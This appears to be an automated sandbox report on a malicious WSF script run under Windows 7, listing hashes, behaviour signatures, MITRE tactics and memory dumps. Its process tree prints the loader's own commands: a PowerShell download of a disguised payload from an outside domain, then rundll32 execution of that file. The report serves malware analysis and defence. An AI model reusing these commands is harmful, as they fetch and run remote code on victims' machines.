ed629c9a335237d8a94f81f7dc656d6d5d4a4214ab007b824c8211f8cdb2b57d

Analysis

max time kernel
405s
max time network
409s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
16/02/2023, 02:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e.wsf
Size

1KB
MD5

6705aa10e4a17025c901675927ed47de
SHA1

b82ce2a7841262cc5fbab26d284de7715b358b3c
SHA256

ed629c9a335237d8a94f81f7dc656d6d5d4a4214ab007b824c8211f8cdb2b57d
SHA512

ea5991609115e47c6593aeecfa31ae76aea877b17ff64419d1e0ee681b5371d0d603aeecada9c148ea8be3c7d27f811787f717a863518eb2d5c5902949ec13f2

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1772	powershell.exe
940	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1472 wrote to memory of 740	1472	WScript.exe	26
PID 1472 wrote to memory of 740	1472	WScript.exe	26
PID 1472 wrote to memory of 740	1472	WScript.exe	26
PID 740 wrote to memory of 940	740	cmd.exe	28
PID 740 wrote to memory of 940	740	cmd.exe	28
PID 740 wrote to memory of 940	740	cmd.exe	28
PID 740 wrote to memory of 1772	740	cmd.exe	29
PID 740 wrote to memory of 1772	740	cmd.exe	29
PID 740 wrote to memory of 1772	740	cmd.exe	29
PID 1772 wrote to memory of 1464	1772	powershell.exe	32
PID 1772 wrote to memory of 1464	1772	powershell.exe	32
PID 1772 wrote to memory of 1464	1772	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:1472
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\r.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C iwr 'http://baracundofres.com/images/150223.gif' -OutFile 'rei.dat'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C Start-Sleep 11;rundll32 rei.dat,Wind
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" rei.dat Wind
      4⤵
      PID:1464

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\r.cmd

Filesize
867B

MD5
9919a2abbdb53145c8c3ef6daa7a1676

SHA1
053ddaa2c16ad4406946a512a2d3f810a14d5aa7

SHA256
d760b90bf3e666d6614b2da14b1b8de6a88e64c8506c287f579d5a10a4fa9d1d

SHA512
1f1b04dacd6011414abc2db525a28368ec66ca0a7ccf168cbaf867bf3831744c983320479609bb153e2108a8df84891f5823ff3db727d395b9f6fb8bf2a06305

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
22228e1982f9ecf6b5f60e753cc73549

SHA1
46bee903dd937c0553e3f66838365fc900ab8224

SHA256
326e21d732c50bb2d2d0c4a79e283dace1b35ad932f992cfccaf58a0107b7893

SHA512
0af05fe5802bb46061f8a603c80c0de8f1908bbc0b266230227f878a79fa85dedc6ddff38d4d86043ead7fce0ea185b766538fcf077c36718ff46ac791b1022d

Download Submit
memory/940-70-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/940-69-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/940-71-0x0000000002A0B000-0x0000000002A2A000-memory.dmp

Filesize
124KB

Download
memory/940-62-0x000007FEF3410000-0x000007FEF3E33000-memory.dmp

Filesize
10.1MB

Download
memory/940-67-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/940-65-0x000007FEF28B0000-0x000007FEF340D000-memory.dmp

Filesize
11.4MB

Download
memory/1472-54-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp

Filesize
8KB

Download
memory/1772-64-0x000007FEF28B0000-0x000007FEF340D000-memory.dmp

Filesize
11.4MB

Download
memory/1772-66-0x0000000002994000-0x0000000002997000-memory.dmp

Filesize
12KB

Download
memory/1772-63-0x000007FEF3410000-0x000007FEF3E33000-memory.dmp

Filesize
10.1MB

Download
memory/1772-68-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1772-72-0x000000000299B000-0x00000000029BA000-memory.dmp

Filesize
124KB

Download
memory/1772-73-0x0000000002994000-0x0000000002997000-memory.dmp

Filesize
12KB

Download
memory/1772-75-0x000000000299B000-0x00000000029BA000-memory.dmp

Filesize
124KB

Download